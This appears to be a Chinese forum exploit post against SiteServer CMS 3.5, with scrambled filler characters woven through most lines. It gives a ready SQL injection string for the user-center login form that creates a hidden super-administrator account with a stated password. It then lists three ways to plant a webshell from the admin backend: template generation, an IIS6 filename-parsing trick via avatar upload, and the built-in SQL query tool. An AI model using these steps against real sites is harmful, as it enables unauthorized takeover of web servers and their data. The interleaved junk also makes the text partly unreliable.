经测试秒杀最新的3.5版
- A( E% Y, u. v$ m. @3 t+ S4 v# o2 v+ H7 c6 }0 z( J
stieserver官网:www.siteserver.cn
6 e( v0 A) m. l F- ~3 J* x1 N8 V% ?, G- J2 j# W0 }2 s
2 E! n( N2 m- F+ q! x+ ^) H/ s
6 f$ D- |% b, Q- x- a$ ]9 UEXP:
5 T# d! C) Y* k* d/ i" ?5 V4 F& B1 G# y1 B8 c
直接访问UserCenter/login.aspx
! Q# }+ y2 P8 {8 i1 E# v
- l0 N. p, [' w) Q) g' J2 E
1 s$ \3 M: @, Y! s) W+ d& a% S# I" W
用户名处输入:
9 k/ } c: G1 _% J7 h! `' v2 J5 o) v& A1 W
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
7 h& a4 Y# n! U1 K+ M7 c- @* n
5 S( f3 |/ b, t0 C( ~' t, p 8 R' ]) j: i: y& O$ s$ i
- {, W$ w; L- M' X" a0 G密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
1 G6 V# {5 h6 F. g, h# n0 X
5 V6 `7 ?: v9 d * P7 |! S, x5 `2 I" u
' |2 L, h! L& h3 W6 j; x7 z之后再访问后台SiteServer/login.aspx用插入的用户登陆2 a7 s/ R8 j* U8 F* O+ V
% \! b, Z( v2 C" P; \5 V! ^
- C* |( L& V7 g# k' ?5 B: q1 e0 y
后台拿webshell的三种方法:4 T5 B7 Y2 k& H& r* |
5 f9 e' u+ G7 p& Z一、
9 L" r; f, |9 @ v/ I5 W' c7 U9 d1 B! J$ b# \
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
i0 m7 T- q0 ?5 w
) ^1 R8 ] k- d% |& E+ E- [( [, n% ]2 z二、
: L! _: M/ a: Y* y& P0 u
, M% a! M0 e$ y' Z成员权限-》添加用户-》用户名为:1.asp2 \5 ?5 ?( z. p8 b
. m, _% I: v8 B( D$ F( Mhttp://127.0.0.1/usercenter/$ X- Q1 n& @* n/ R+ I6 R
1 r- ^5 s# O. r0 j7 x, M用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
" F) A' N9 m7 \, o6 v4 z( w1 ?
p o) i: B; M+ A9 l/ z) {) t7 L(ps:后台添加用户时不会验证是否含有非法字符)
7 V/ k/ u% }5 ` Z- ^9 k9 ^5 ], Q4 G2 z# Q
三、
$ B1 l# O. H4 a+ p/ a6 l
1 W) e; f# I9 Y& p8 C8 r系统工具-》实用工具-》机器参数查看/ F c1 `( u+ }, R1 P" u; a
可以看到数据库类型、名称,WEB路径1 J2 j, D3 h+ |( A. ?" J
9 {% K; D. |1 r6 T2 v7 E! L
系统工具-》数据库工具-》SQL语句查询" q+ s" F: T8 B: s
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。1 C; D# Y' `% [! U! X
* [9 B1 d7 n6 n7 v4 N( P
|